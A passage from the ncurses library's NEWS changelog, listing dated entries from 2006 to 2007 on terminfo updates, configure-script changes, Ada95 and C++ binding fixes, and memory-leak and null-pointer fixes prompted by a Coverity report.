3417 tested with xterm. 3418 + minor fixes for the database iterator. 3419 + fix some buffer limits in c++ demo (comment by Falk Hueffner in 3420 Debian #348117). 3421 3422 20060114 3423 + add toe -a option, to show all databases. This uses new private 3424 interfaces in the ncurses library for iterating through the list of 3425 databases. 3426 + fix toe from 20000909 changes which made it not look at 3427 $HOME/.terminfo 3428 + make toe's -v option parameter optional as per manpage. 3429 + improve SIGWINCH handling by postponing its effect during newterm(), 3430 etc., when allocating screens. 3431 3432 20060111 3433 + modify wgetnstr() to return KEY_RESIZE if a sigwinch occurs. Use 3434 this in test/filter.c 3435 + fix an error in filter() modification which caused some applications 3436 to fail. 3437 3438 20060107 3439 + check if filter() was called when getting the screensize. Keep it 3440 at 1 if so (based on Redhat #174498). 3441 + add extension nofilter(). 3442 + refined the workaround for ACS mapping. 3443 + make ifdef's consistent in curses.h for the extended colors so the 3444 header file can be used for the normal curses library. The header 3445
http://ncurses.scripts.mit.edu/?p=ncurses.git;a=blob;f=NEWS;h=05ea4b7f286fa9a1ec3dd08bb9a600853064b6e8;hb=4204d0154d2ee2d272807a0023d38ed9035ea555
CC-MAIN-2022-33
refinedweb
25,550
66.13
As you know, Perl has several magic global variables, subroutines, and literals that have the same meaning no matter what package they are called from. A handful of these variables have special meaning when running under mod_perl. Here we will describe these and other global variables maintained by mod_perl. Don't forget that Perl code has a much longer lifetime and lives among many more namespaces in the mod_perl environment than it does in a conventional CGI environment. When modifying a Perl global variable, we recommend that you always localize the variable so modifications do not trip up other Perl code running in the server. We begin with the list of magic global variables that have special significance to mod_perl. $0 When running under Apache::Registry or Apache::PerlRun, this variable is set to that of the filename field of the request_rec. When running inside of a <Perl> section, the value of $0 is the path to the configuration file in which the Perl section is located, such as httpd.conf or srm.conf. $^X Normally, this variable holds the path to the Perl program that was executed from the shell. Under mod_perl, there is no Perl program, just the Perl library linked with Apache. Thus, this variable is set to that of the Apache binary in which Perl is currently running, such as /usr/local/apache/bin/httpd or C:\Apache\apache.exe. $| As the perlvar(1) manpage explains, if this variable ... No credit card required
https://www.safaribooksonline.com/library/view/writing-apache-modules/156592567X/156592567X_ch09-12332.html
CC-MAIN-2018-34
refinedweb
247
62.98
29 December 2008 23:53 [Source: ICIS news] (Adds Standard and Poor’s, Moody's downgrade, stock closings in paragraphs 9-13) ?xml:namespace> “Cancellation of K-Dow could compromise Dow’s ability to close its pending acquisition of Rohm and Haas, a key element of Dow’s strategic plan, although neither that deal nor related financing is contingent upon closing of K-Dow,” said Bank of America analyst Kevin McCarthy in a research note. On 1 December, US-based Dow Chemical finalised its K-Dow commodity chemical joint venture agreement with Dow could file an arbitration claim for up to $2.5bn for the break-up of the deal in. Without the cash from the K-Dow deal, Dow would be highly leveraged if it were to complete its acquisition of Rohm and Haas, noted McCarthy. If Dow completed the Rohm and Haas deal on its original terms, the company would have net debt of up to $29.6bn, representing a leverage ratio of 4.5x estimated 2009 earnings before interest, tax, depreciation and amortization (EBITDA), McCarthy projected. The merger arbitrage spread on Rohm and Haas has widened to $27.81, or 55.4%, indicating growing scepticism among investors that the deal will go through on the original terms, if at all. The K-Dow collapse prompted Standard & Poor's (S&P) to pull down Dow's corporate credit and senior unsecured ratings from A-minus to BBB while its long-term ratings remained on S&P's CreditWatch with "negative implications". "This decision was unexpected given Dow's recent confidence that it would close the transaction, and is a significant development from both a strategic and financial profile standpoint," said Standard & Poor's credit analyst Kyle Loughlin. Moody's Investor Service lowered Dow's senior unsecured ratings to Baa1 from A
http://www.icis.com/Articles/2008/12/29/9181090/K-Dow-collapse-endangers-Rohm-and-Haas-deal-BoA.html
CC-MAIN-2014-10
refinedweb
303
51.68
Please note before reading this, this is a keylogger, no its not used for malicious purposes as it only runs with the programing prompt open and stops as soon as the program is exited. Just trying to show my computer teachers something, because he's an idiot who gets his lessons straight out of a text book :confused: I tried it up to the non-working line and the file worked fine except it would hog the processor, and when compiled would stop working, so there goes that solution lol. Anyways what am I doing wrong in that line. I checked at least 15 times to make sure I nested everything right but everything seems to be in check. My problem however is the line highlighted in bold. Dev C++ 4.9.8.0 gives me a "[WARNING] comparison" #include <stdio.h> #include <windows.h> #include <Winuser.h> cout <<"\n Your keys are now being saved to a file called Key.txt in your C:\ Windows Folder. As soon as you exit this program it wll stop logging your keys"; void keys(int key,char *file) { FILE *key_file; key_file = fopen(file,"a+"); if (key==8) fprintf(key_file,"%s","[del]"); if (key==13) fprintf(key_file,"%s","\n"); if (key==32) fprintf(key_file,"%s"," "); if (key==VK_CAPITAL) fprintf(key_file,"%s","[Caps]"); if (key==VK_TAB) fprintf(key_file,"%s","[TAB]"); if (key ==VK_SHIFT) fprintf(key_file,"%s","[SHIFT]"); if (key ==VK_CONTROL) fprintf(key_file,"%s","[CTRL]"); if (key ==VK_PAUSE) fprintf(key_file,"%s","[PAUSE]"); if (key ==VK_KANA) fprintf(key_file,"%s","[Kana]"); if (key ==VK_ESCAPE) fprintf(key_file,"%s","[ESC]"); if (key ==VK_END) fprintf(key_file,"%s","[END]"); if (key==VK_HOME) fprintf(key_file,"%s","[HOME]"); if (key ==VK_LEFT) fprintf(key_file,"%s",""); if (key ==VK_UP) fprintf(key_file,"%s","[UP]"); if (key ==VK_RIGHT) fprintf(key_file,"%s",""); if (key ==VK_DOWN) fprintf(key_file,"%s","[DOWN]"); if (key ==VK_SNAPSHOT) fprintf(key_file,"%s","[PRINT]"); if (key ==VK_NUMLOCK) fprintf(key_file,"%s","[NUM LOCK]"); if (key ==190 || key==110) fprintf(key_file,"%s","."); if (key >=96 && key <= 105){ key = key - 48; fprintf(key_file,"%s",&key); } if (key >=48 && key <= 59) fprintf(key_file,"%s",&key); if (key !=VK_LBUTTON || key !=VK_RBUTTON){ if (key >=65 && key <=90){ if (GetKeyState(VK_CAPITAL)) fprintf(key_file,"%s",&key); else { key = key +32; fprintf(key_file,"%s",&key); } } } fclose(key_file); } int main() { char i; char test[MAX_PATH]; GetWindowsDirectory(test,sizeof(test)); strcat(test,"//keys.txt"); while(1){ for(i=8;i<=190;i++){ [B] //THIS IS WHERE MY COMPILER ERROR IS[/B] if (GetAsyncKeyState(i) == -32767) { keys (i,test); } } } }
https://www.daniweb.com/programming/software-development/threads/56614/help-with-fixing-my-source-code
CC-MAIN-2017-34
refinedweb
411
59.13
Ruby Metaprogramming: Part I If you’re working with Ruby, chances are by now you’ve heard the word “metaprogramming” thrown around quite a lot. You may have even used metaprogramming, but not fully understood the true power or usefulness of what it can do. By the end of this article, you should have a firm grasp not only of what it is, but also what it capable of, and how you can harness one of Ruby’s “killer features” in your projects. What is “metaprogramming”? Metaprogramming is best explained as programming of programming. Don’t let this abstract definition scare you away though, because Ruby makes metaprogramming as easy to understand as it is to work with. Metaprogramming can be used a way to add, edit or modify the code of your program while it’s running. Using it, you can make new or delete existing methods on objects, reopen or modify existing classes, catch methods that don’t exist, and avoid repetitious coding to keep your program DRY. Understanding how Ruby calls methods Before you can understand the full scope of metaprogramming, it’s imperative that you grasp how Ruby finds a method when it is called. When you call a method in Ruby, it must locate that method (if it exists) within all the code that is within the inheritance chain. class Person def say "hello" end end john_smith = Person.new john_smith.say # => "hello" When the say() method is called in the example above, Ruby first looks for the parent of the john_smith object; because this object is an instance of the Person class, and it has available a method called say(), this method is called. Things get more complicated however when the object is an instance of a class which has inherited from another class: class Animal def eats "food" end def lives_in "the wild" end end class Pig < Animal def lives_in "farm" end end babe = Pig.new babe.lives_in # => "farm" babe.eats # => "food" babe.thisdoesnotexist # => NoMethodError: undefined method `thisdoesnotexist' for #<Pig:0x16a53c8> When we introduce inheritance into the mix, Ruby needs to consider methods defined higher in the inheritance chain. When we call babe.lives_in(), Ruby first checks the Pig class for the method lives_in(); because it exists, it’s called. It’s a slightly different story when we call the babe.eats() method, though. Ruby checks for that method by asking the Pig class if it can respond to eats(), and in the absence of that method existing on Pig, it will continue by asking the parent class Animal if it can respond; it can in our case, so it will be called. When we call babe.thisdoesnotexist(), because the method does not exist, we get a NoMethodError exception. You can think of this as a sort of cascade: whatever method is defined lowest in the inheritance chain will be the method that ends up being called; if the method doesn’t exist at all, an exception is raised. Based on what we have discovered so far, we can summarise the way Ruby looks up each method as a pattern something like the following: -. Note that because every object inherits from Object (or BasicObject in Ruby 1.9) at the very top level, that class will always be the last to be asked, but only if it makes it that far up the inheritance chain without finding a method that can respond. Introducing the Singleton class Ruby gives you the full power of Object Oriented programming and allows you to create objects that inherit from other classes and call their methods; but what if only a single object requires an addition, alteration, or deletion? The “singleton class” (sometimes known as the “Eigenclass”), is designed exactly for this and allows you to do all that and more. A simple example is in order: greeting = "Hello World" def greeting.greet self end greeting.greet # => "Hello World" Let’s digest what’s just happened here line by line. On the first line, we create a new variable called greeting that represents a simple String value. On the second line, we create a new method called greeting.greet, and give it a very simple content. Ruby allows you to choose what object to attach a method definition to by using the format some_object.method_name, which you may recognize as the same syntax for adding class methods to classes (ie. def self.something). In this case, as we had greeting first, the method has been attached to our greeting variable. On the final line, we call the new greeting.greet method we just defined. The greeting.greet method has access to the entire object it has been attached to; in Ruby, we always refer to that object as self. In this case, self refers to the String value we attached it to. If we had attached it to a Array, self would have returned that Array object. As you’re about to see, adding methods using some_object.method_name is not always the best way to do such tasks. That’s why Ruby provides another far more useful way of working with objects and their methods in a dynamic way. Meet the Singleton class: greeting = "i like cheese" class << greeting def greet "hello! " + self end end greeting.greet # => "hello! i like cheese" The syntax is very strange, but the outcome is the same as our some_object.method_name way of adding methods. This singleton class method allows you to add many methods at once without having to prefix all of your method names. This syntax also allows you to add anything you would normally add during the declaration of a class, including attr_writer, attr_reader, and attr_accessor methods. How does it work? So how does it actually work? The name “singleton class” might have given this away slightly, but Ruby is sneaky and adds another class into our inheritance chain. When you try to operate on the singleton class, Ruby needs a way to add methods to the object we’re adding to, something that the language does not allow. To get around this it creates a secret new class, which we call the “singleton class”. This class is given the methods and changes instead, is made the parent of the object we’re working on. This singleton class is also made an instance of the previous parent of our object so that the inheritance chain remains mostly unchanged: some object instance > singleton class > parent class > ... > Object/BasicObject Returning to what we know about Ruby method lookup, we previously decided that there was three simple steps that the Ruby interpreter followed when looking up a method. Singleton classes add one extra step to this lookup process: - Ask the object if its singleton class can respond to the method, calling it if found. -. As we previously discussed, you can think of this as a cascade, and that has a very important impact on our idea of objects in Ruby: not only can Objects gain methods from their inherited classes, but now they can gain individually unique methods as the program is running. Putting metaprogramming to work with instance_eval and class_eval Having singleton classes is all good and well, but to truly work with objects dynamically you need to be able to re-open them at runtime within other functions. Unfortunately, Ruby does not syntactically allow you to have any class statements within a function. This is where instance_eval comes into the picture. The instance_eval method is defined in Ruby’s standard Kernel module and allows you to add instance methods to an object just like our singleton class syntax. foo = "bar" foo.instance_eval do def hi "you smell" end end foo.hi # => "you smell" The instance_eval method can take a block (which has self set to that of the object you’re operating on), or a string of code to be evaluated. Inside the block, you can define new methods as if you were writing a class, and these will be added to the singleton class of the object. Methods defined by instance_eval will be instance methods. It’s important to note that the scope is that of instance methods, because it means you can’t do things like attr_accessor as a result. If you find yourself needing this, you’ll want to operate on the Class of the object instead using class_eval: bar = "foo" bar.class.class_eval do def hello "i can smell you from here" end end bar.hello # => "i can smell you from here" As you can see, instance_eval and class_eval are very similar, but their scope and application differs ever so slightly. You can remember what to use in each situation by remembering that you use instance_eval to make instance methods, and use class_eval to make class methods. Why do I care? As this point you’re probably thinking “that’s great, but why should I care? What real world value does any of this have?” The simple answer is “yes you should” and “a lot”. two of this series we’ll look at how to apply Metaprogramming to everyday problems, and see how the elegance and power of it can change the way you develop solutions forever. - Debbie - Matteo - J. Merrill - Bluebells
http://www.sitepoint.com/ruby-metaprogramming-part-i/
CC-MAIN-2014-15
refinedweb
1,534
70.02
Proposed features/camp site pitch Contents Tagging of individual pitches One might be interested in tagging individual pitches within a campground. Pitch means (in this context) the free space used to place 1 tent or 1 caravan.. This proposal builds on the earlier work in tagging individual pitches at Proposed features/Extend camp site but changes tag names to be more consistent in the use of namespace conventions and to use tag names consistent with current practices. Tag Conventions To avoid confusion (Who gets confused ?) between the sporting use of the word pitch (see leisure=pitch), a place for pitching a tent or parking a caravan is called a "camp pitch" (camp_site=camp_pitch) and the facilities at that pitch that are dedicated to the use of the pitch occupants use a camp_pitch:*=<value> name space tagging system. There may be items like tables, water supply, fire rings associated with the pitch. If the item is specifically for the use of the occupant of the pitch, then use pitch name space specific tags. If the item is shared by multiple pitches or by the campground as a whole then it should be tagged using a more general tag. Tags within the camp_pitch:* namespace follow, as closely as possible, the naming used for the equivalent amenity if it were not dedicated to the pitch occupants. For example, a publically available supply of drinking water is normally tagged amenity=drinking_water so camp_pitch:drinking_water=yes/no is used to indicate whether or not there is an exclusive drinking water supply for that pitch. Tagging A camp pitch is tagged either as a point, located at the pitch identifying post or sign, or a way around the boundary of the pitch. The following tags are placed on the point or way: 1) Why the need for camp_site=camp_pitch ? Why not: camp_pitch=ref;addr;type;parking;table;stove;surface;electric;water;drain where if the item is listed 'yes' is default. 2) Grass pitches may move - to allow grass to recover from being camped on. 3) It should be clear that the part after "camp_pitch" should not just be made up. Those are OSM tags mentioned elsewhere. Brycenesbitt (talk) 23:26, 1 May 2015 (UTC)
http://wiki.openstreetmap.org/wiki/Proposed_features/camp_site_pitch
CC-MAIN-2017-17
refinedweb
369
59.13
Re: BT2006 Debatching from SQL Adapter - From: "rclb" <ray.crager@xxxxxxxxxxxxxxx> - Date: 30 Jul 2006 06:44:05 -0700 How do you have the Any node set up in the schema? In the schema editor try setting the Namespace property of the Any node to ##any and the Process Content to skip. Gregory Harris wrote: Hi all, excuse me if this one is a little long... I'm wondering if I'm missing something: I am using the SQL adapter for Biztalk 2006 against a SQL Server 2005 database. I have a receive location polling a table and the generated schema has a target namespace like. Fine so far. Now I wish to debatch the group of records returned by the adapter into individual messages. ie. use an Envelope. An example of using Envelopes with the SQL adapter is at (). All the examples I've seen tell me to set the TNS of the Envelope schema to the same as the TNS for the generated records. However, if I do this, I'm getting errors on my receive pipeline saying "Unexpected event ("document_start") in state "processing_empty_document". " This appears (my assumption, feel free to correct me) to be because in the envelope, the item type is set to xs:any. When the pipeline breaks out each of these elements, the item itself does not have any namespace reference, and thus fails. I can't specify the exact type for the item in the envelope schema, as I am not allowed to import an XSD whose namespace is the same as the envelopes. If I manually add the correct namespace to the individual items in a sample file, I can successfully test the pipeline. eg. <ns0:Items xmlns: <ns1:Item xmlns:ns1= "http:a.b.c/Schemas/MyDatabase" Name="SomeSample/> </ns0:Items> Can anyone see anything obviously wrong please? Thank You, Greg Harris . - References: - BT2006 Debatching from SQL Adapter - From: Gregory Harris - Prev by Date: Mapping doesn't create new fields - Next by Date: -> NON-UNIFORM SEQ Convoy Issue - Previous by thread: BT2006 Debatching from SQL Adapter - Next by thread: NON-SEQ Convoy ISSUE - Index(es):
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2006-08/msg00028.html
CC-MAIN-2013-20
refinedweb
354
71.65
09 November 2010 23:53 [Source: ICIS news] (adds updates throughout) HOUSTON (ICIS)--One person died on Tuesday and another was seriously injured when a storage tank exploded at DuPont’s ?xml:namespace> A worker employed by a mechanical contractor died, DuPont said. Another worker was injured and transported to a local hospital. “The incident involved an empty tank that had been taken out of service and was undergoing maintenance work,” DuPont said. “While workers were welding equipment connected to the tank, an explosion took place which resulted in the injuries.” DuPont added: “The incident was limited to the equipment that was being worked on and the process involved has been shut down.” The explosion occurred at 10:45 hours “At this point we do not believe there was any hazardous material released to the environment,” DuPont said. “The site was not evacuated, and all other personnel on the site have been accounted for.” DuPont said local authorities were investigating the incident. The US Chemical Safety Board (CSB) said it had contacted DuPont and was gathering information. The DuPont facility manufactures products used in the building industry for countertop installations and wall cladding, as well as film used for covering applications, according to news reports. Additional reporting by Ben DuBose and Joe Kamalick For more on DuPont visit ICIS company intelligence For more on vinyl
http://www.icis.com/Articles/2010/11/09/9408802/One-dead-one-injured-after-DuPont-New-York-plant-blast.html
CC-MAIN-2014-35
refinedweb
225
52.9
Hello, I am writing a program in C++ that uses also C sources. As this program is pretty big project and I work on it with different people I would like to hide thousands of internal functions that are defined in C source files and leave to other programmers only interfaces or wrappers written by me to those functions. Making long story short, the example defining this is given below, and a quiestion is: how to make g() and h() functions invisible to Cpp programs but to leave them visible to other C sources. Cheader.h: defines one "usable" function for which I write a c++ wrapper int F(int x); Csource.c: #include "Cheader.h" /* helper functions */ int h(int x) { return x*x; } int g(int x) { return -x/x; } /*exported function*/ int F(int x) { return h(x)+g(x); } My Cpp wrapper: header: extern "C"{ #include "Cheader.h" } int Fpp(int x) { return F(x); }
http://www.gamedev.net/topic/645883-how-to-hide-global-functions-from-c-files-in-c-program/
CC-MAIN-2014-41
refinedweb
159
67.49
By Reza Lotun, AWS Community Developer Modern Web applications often employ a variety of datastores in their design to support different application requirements. This article takes you through a whirlwind tour of setting up an Amazon Elastic Compute Cloud (Amazon EC2) instance with a Django installation, ready to interface with three varieties of datastoresMySQL using Amazon Relational Database Service (Amazon RDS), Amazon SimpleDB, and Redis hosted on Amazon EC2 backed by Amazon Elastic Block Store (Amazon EBS). After reading this article, you should be able to incorporate any or all of these stores into your own application. Introduction So, you want to build a complex Web application? What does that mean, and how is this article different from any other of the thousands of articles that revolve around the time-tested Linux, Apache, MySQL, Python/Perl/PHP/etc. (LAMP) approach? Modern Web applications such as Twitter or Facebook employ "killer features"social networks, support for huge user bases, and real-time elements like chat. Although you may not be looking to build a service operating at the massive scale these sites offer, it is often useful to design your architecture in a way that can incorporate similar concepts. The goal is to maximize flexibility by using the right datastores for the job. The beauty of using Amazon Web Services (AWS) is that your application does not have to conform to a rigid architecture. You can take what you'd like from the following examples and adapt them to your own needs. The basic mantra you'll be adopting, though, is "why choose one?" You'll be using all three! The following isn't meant to be a polemic that alternative, nonrelational datastores are the be-all and end-all. On the contrary, this article makes the point that each datastore has specific strengths and weaknesses. This article presents each datastore in an area that highlights its strength and shows you how to leverage it in a Python setting. It also shows that AWS offers all the building blocks you need to incorporate any sort of datastore you need into your architecture. You'll learn about: - MySQL. Using Amazon RDS, you can have a managed MySQL installation in which you have full control over the machine type and storage it uses. With a few application programming interface (API) calls, you can scale resources up or down as you require. MySQL and other relational databases excel at storing highly structured data that need to be modified in a transactional way. Also, you can take advantage of the plethora of Django applications that exist already to add functionality to your application. - Amazon SimpleDB. Amazon SimpleDB is an example of a distributed key-value store. It is specifically designed for high scalability and is intended as a store for small pieces of indexable data, or rather meta-data. Unlike MySQL, Amazon SimpleDB is schema-less, and operations on it are eventually consistent. MySQL and Amazon SimpleDB are completely different beaststwo tools that solve very different problems. You'll be using Amazon SimpleDB to store user account information. - Redis. Another key-value store, Redis is similar to memcached in its ease of use and speed. Unlike memcached, it supports varying levels of persistence and advanced atomic operations on data structures such as lists, sets, and ordered sets. Some applications for Redis include a fast persistent session back end for Django, a real-time statistics tracker, and a URL shortener service. Although Redis is something you would host yourself on Amazon EC2, this article shows you how best to do it by backing its persistence store with an Amazon EBS partition. Note: Notice that Amazon SimpleDB is "eventually consistent." What does that mean exactly? Without getting into too much detail, it's important to understand one fact about storing data on Amazon SimpleDB: Your data are spread across many machines. The basic problem, then, is this: If you make a write to one machine, does the "knowledge" of that write propogate instantaneously to all other machines? Intuitively, you would say nosome amount of time has to exist before all copies of your data on multiple machines are "consistent" in some way. Although Amazon SimpleDB is eventually consistentthat is, you usually have to wait on the order of seconds for a read immediately issued on changed data to reflect the previous writea new feature on reads has just been introduced, allowing consistent reads. What this means is that you can issue a read, and the result will block until all writes affecting the data that are read propagate. This functionality can be useful in some situations, as you'll see later. Two Hats, One Head Okay, enough philosophizingtime for some code. A lot of people who venture into cloud computing platforms such as AWS come from a mixed background of development and operations. The lines between these two areas are blurring, but it's still useful to make a distinction between them. On the development side, you'll wear your software engineering hats and think in terms of architecture and algorithms, systems, data flow, and requirements and test. At this level of abstraction, you'll be working mostly at the framework level and your architecture. On the operations side, you often think in terms of deployments, servers, and metrics. You have code that you need to put onto machines. You have tools and other systems that need to monitor those machines. There are issues of maintenance and performance measuring as well as load testing. Another requirement is thinking of failureyou have to plan for it to happen rather than be surprised when it does. This article touches on both of these areas. As you can imagine, both influence each other in a tight feedback loop. You'll wear two hats and touch on two different toolsets when dealing with the following ideas. The tools in your arsenal will be: - Development: - Django. A popular Python-based Web framework - Operations: Installation and Setup This article assumes that you have a working Python and Django environment, with easy_install or pip available. If not, please consult the relevant documentation to set up one of these two packages (preferably pip). installation of Boto and Fabric is simple (if you're using easy_install, replace pip install with easy_install): $ pip install boto $ pip install fabric Assume that your AWS access key and secret key are located as environment variables: $ export AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY $ export AWS_SECRET_KEY=YOUR_SECRET Note: It's important never to give away your secret key. Keep it safetry not to hard-code it into any source files. There are tools to mitigate this risk slightly. Use them: You won't regret it. Environment This article assumes that you're running on Amazon EC2 to take advantage of lower latency and all the free bandwidth within the cloud. Launch an Amazon EC2 instance on which to run your Django and Redis installation. You'll be using Alestic's Ubuntu 9.10 32-bit Amazon Machine Image (AMI) ami-bb709dd2, the default security group, and an existing key denoted by "key." You collect all of your operations steps in a fabfile. A fabfile is Fabric's way of collecting a number of commands. It starts to become really useful when you're executing these commands over many servers, but for now, just stick your Boto commands in there. You might find it useful to adopt the same approach to any of your Python projects on AWS a fabfile with routines to deploy code and manage servers. To start, save the following code into a file called fabfile.py: import sys import time import boto AMI = 'ami-bb709dd2' def launch_ec2_instance(): c = boto.connect_ec2() # get image corresponding to this AMI image = c.get_image(AMI) print 'Launching EC2 instance ...' # launch an instance using this image, key and security groups # by default this will be an m1.small instance res = image.run(key_name='key', security_groups=['default']) print res.instances[0].update() instance = None while True: print '.', sys.stdout.flush() dns = res.instances[0].dns_name if dns: instance = res.instances[0] break time.sleep(5.0) res.instances[0].update() print 'Instance started. Public DNS: ', instance.dns_name You've defined a fabric command called launch_instance, which is simply a function. To run it, use the following code: $ fab launch_ec2_instance Launching EC2 instance... u'pending' . . . Instance started. Public DNS: ec2-72-44-40-153.z-2.compute-1.amazonaws.com Done. You now have an Amazon EC2 instance started that you can use SSH to access using your key. Do that using Fabric. Add the following code to your fabfile.py: from fabric.api import env, sudo # this should be a path to your SSH key for the EC2 instance key_path = '/home/me/keys/key' def live(): # DNS entry of our instance env.hosts = ['ec2-72-44-40-153.z-2.compute-1.amazonaws.com'] env.user = 'ubuntu' env.key_filename = key_path def setup_packages(): sudo('apt-get -y update') sudo('apt-get -y dist-upgrade') sudo('apt-get install -y python python-django') You've now defined two commands: one to define your "live environment" and one to execute a series of commands that update your instance to the newest software and install Django. If you had a development and staging environment, you would add corresponding functions for those, as well. To execute the setup on your live environment, use the code: $ fab live setup_packages Fabric runs the list of commands in sequence. The live command simply defines a list of machines to run subsequent commands over. By adding to your list of instances, you can code one task once and have it executed over many machines. Throughout the rest of this article, you'll be developing locally and deploying your code to the instance. For example, you can have a code repository with a clone on your instance, and the deployment step could simply be a Fabric command that would update to the latest code on the remote instance and restart your server. Now that you have your basic environment, you can set up your MySQL database. Setting Up Amazon RDS Although you have the option of running MySQL yourself on Amazon EC2 with Amazon EBS, Amazon RDS offers you the ability to let Amazon do all the heavy lifting and management for you. You'll use an Amazon RDS back end for a Django project. An Amazon RDS instance is like an Amazon EC2 instance, except that its sole purpose is to run MySQL. def initialize_db(): """ Initializes a one-time RDS instance. This should only be a one-time call. """ rds = boto.connect_rds() sg = rds.create_dbsecurity_group('dbsg', 'My database security group.') groups = rds.get_all_dbsecurity_groups() print 'All database security groups: ', groups ec2 = boto.connect_ec2() ec2_groups = ec2.get_all_security_groups(['default']) for g in ec2_groups: sg.authorize(ec2_group=g) pg = rds.create_parameter_group(name='dbparamgrp', description='My DB parameter group.') inst = rds.create_dbinstance(id='dbid', allocated_storage=10, instance_class='db.m1.small', master_username='data_muncher', master_password='mysecretpassword', param_group='dbparamgrp', security_groups=['dbsg']) print 'Launching instance...' time.sleep(5) def db_status(): rds = boto.connect_rds() rs = rds.get_all_dbinstances() if rs: for inst in rs: print 'DB instance %s, status: %s, endpoint: %s' % ( inst.id, inst.status, inst.endpoint) else: print 'No RDS instances.' The first command spawns a small Amazon RDS instance with 10 GB of disk capacity from scratch. Notice that there are three steps: - Create a database security group. Here, your security group has a name and description. These are important concepts and allow you to restrict access to your database instances either to specific IP addresses, IP ranges, or other Amazon EC2 groups. You've decided to allow the default Amazon EC2 group to connect to this instance. - Create a parameter group. This is an abstraction of the mysql.conffile. - Create an Amazon RDS instance. Spawn the actual Amazon RDS instance with a given ID, resources, configuration, and user options. Now, you can run it. $ fab initialize_db Launching instance... Done. You've begun the process of launching the instance. It takes a few seconds to a few minutes, although you can check the process manually by running the status command: $ fab status DB instance dbid, status: creating, endpoint: None Done. $ fab status DB instance dbid, status: available, endpoint: (u'dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com', 3306) Done. Your Amazon RDS instance has started! You have the full Domain Name System (DNS) entry for it, and it's ready to accept data. Before you can do anything, however, you need to create the actual MySQL databases, which you can do from the MySQL command-line client: mysql -u root -h dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com -p CREATE DATABASE dbname; GRANT ALL ON dbname.* TO 'dbuser'@'localhost' IDENTIFIED BY 'mypass'; Now that your MySQL environment has been completely initialized, you can tell Django to start using it by editing your settings.py file: DATABASE_ENGINE = 'mysql' DATABASE_NAME = 'dbname' DATABASE_USER = 'dbuser' DATABASE_PASSWORD = 'mypass' DATABASE_HOST = 'dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com' DATABASE_PORT = '' # Set to empty string for default. At this point, you can run a complete Django installation: $ python manage.py syncdb Although you have code to reproduce launching your Amazon RDS instance, you can add other tools to your fabfile to aid in administration. One such tool is CloudWatch, Amazon's metrics API that often gets bundled with certain Web services. Luckily, Amazon RDS is one of them. Here's an example plug-in to use CloudWatch and Amazon RDS: from datetime import datetime def get_cpu_stats(): c = boto.connect_cloudwatch() end = datetime.now() start = end - timedelta(days=4) data = c.get_metric_statistics(60, start, end, 'CPUUtilization', 'AWS/RDS', ['Average']) points = [(d['Average'], d['Timestamp']) for d in sorted(data, key=lambda x: x['Timestamp'])] print '\nCPU utilization on average for each of the past 20 minutes: ' for p in points[-20:]: av, ts = p print '\tCPU: %.2s\t\t%s' % (av, ts) Running this plug-in would produce: $ fab get_cpu_stats CPU utilization on average for each of the past 20 minutes: CPU: 10 2010-05-25T23:05:00Z ... CPU: 13 2010-05-25T23:31:00Z Done. Next, you can integrate a completely different datastore into your Django setup, allowing you to introduce an extra dimension of scalability. Setting Up Amazon SimpleDB Amazon SimpleDB is a key-value datastore. It was designed to be scalable and redundantparticularly useful for applications involving heavy writes of small pieces of indexable data. This makes it particularly suited to storing metadata rather than the full data itself. For example, say that you have multiple client implementations of a product that exist on the Web, desktop, and mobile devices. To implement lightweight user accounts, it might be useful to offload authentication data and other lightweight metadata about user accountssuch as user name, password hashes, creation time, and last updated timeonto a system like Amazon SimpleDB. In this example, you'll do just that, allowing you to implement an alternative authentication back end on Django. One thing to note about Amazon SimpleDB is its terminology and structure. At the top level, you have domains. Think of domains as namespaces with specific limits on size. Users are allowed 100 domains to name and store data as they please. Within these domains, data are stored in items. Items have an item name and attribute-to-value mappings. More than one value can be associated with an attribute. Think of Amazon SimpleDB as a sort of large distributed hash map or dictionary. One of the limits of Amazon SimpleDB is that domains can only be 10 GB. Also, keep in mind that operations on different domains interact with different servers within the Amazon SimpleDB system. You'll use a trick that those who've used memcached are familiar with: using a set of domains to store data. If you have N domainssay, 16you'll take a hash of the item name to get a 32-bit number, and take the modulus of that by 16 to get the domain for that item. Look at an example of how Amazon SimpleDB could work by implementing an authentication back end for Django. Although Django comes packaged with a robust model back end intended for use over a relational database like MySQL, you'll do it over Amazon SimpleDB. Why? Perhaps you have a variety of clients, such as mobile devices, desktop applications, and Web users who routinely authenticate into your system or create accounts. That's a lot of writes that you might want to parallelize as much as possible. Also, because this is highly sensitive data, you want it available and redundantly stored. To begin, create those 16 domains. You can modify this number to suit your needs. Again, stick this initialization code in your fabfile: NUM_USER_DOMAINS = 16 def create_user_domains(): conn = boto.connect_sdb() domain_name_template = 'user_%s' for i in xrange(NUM_USER_DOMAINS): name = domain_name_template % str(i).zfill(3) dom = conn.create_domain(name) print 'Created ', dom Domain creation is idempotent, meaning that you can safely run this command as many times as you want without affecting already-created domains. Now that you have your domains, you can implement a Django authentication back end: """ auth.py Custom authentication backend that delegates authentication to accounts stored in SimpleDB. """ import hashlib import boto from django.conf import settings from django.contrib.auth.models import User NUM_USER_DOMAINS = 16 sdb_conn = boto.connect_sdb() # domain_map will be a map of domain number to domain domain_map = {} for i in xrange(NUM_USER_DOMAINS): domain_name = 'user_%s' % str(i).zfill(3) domain_map[i] = sdb_conn.get_domain(domain_name) def get_domain(username): # prepend username with formatter string user_hash = '!u:%s' % username # use Python hash, since it's fast bucket = hash(user_hash) % NUM_USER_DOMAINS return domain_map[bucket] class SimpleDBBackend(object): def authenticate(self, username=None, password=None): if not username or not password: return None dom = get_domain(username) user_entry = dom.get_item(username) if user_entry is None: # the user doesn't exist return None # you'll probably also want to store a salt with the # password hash phash = hashlib.sha1(password).hexdigest() # assume we have an attribute 'pass' on the item which # maps to password hashes stored_phash = user_entry.get('pass', '') if phash == stored_phash: # valid password try: user = User.objects.get(username=username) except User.DoesNotExist: # create a new user object user = User(username=username, password='empty') user.save() return user else: return None def get_user(self, user_id): try: return User.objects.get(pk=user_id) except: return None Next, edit your Django settings.py file: AUTHENTICATION_BACKENDS = ('mydjangoproject.auth.SimpleDBBackend', 'django.contrib.auth.backends.ModelBackend', ) This file first uses your Amazon SimpleDB back end to authenticate users, and then falls back on the built in Django ModelBackend to deal with user permissions. Of course, you can 